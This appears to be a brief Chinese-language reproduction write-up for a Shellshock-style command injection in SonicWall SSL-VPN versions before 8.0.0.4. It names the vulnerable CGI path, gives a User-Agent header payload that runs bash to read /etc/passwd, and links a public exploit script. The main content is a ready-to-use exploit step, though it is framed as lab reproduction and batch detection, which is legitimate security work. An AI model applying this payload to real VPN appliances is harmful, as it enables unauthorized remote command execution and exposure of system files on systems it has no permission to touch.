SonicWall:一款VPN解决方案,包含WEB界面、VPN功能等
复现环境:公司实验室
复现版本:SonicWall
环境搭建:
略
无
SonicWall SSL-VPN < 8.0.0.4
攻击环境:kali x64
访问目标,burp抓包,将访问地址修改为
/cgi-bin/jarrewrite.sh
将User-Agent修改为
User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd'
批量脚本见batch-detect.py(脚本很简陋,正在写脚本时,领导分配了一个渗透任务,实在没时间了。。),执行结果如下:
https://github.com/darrenmartyn/VisualDoor/blob/main/visualdoor.py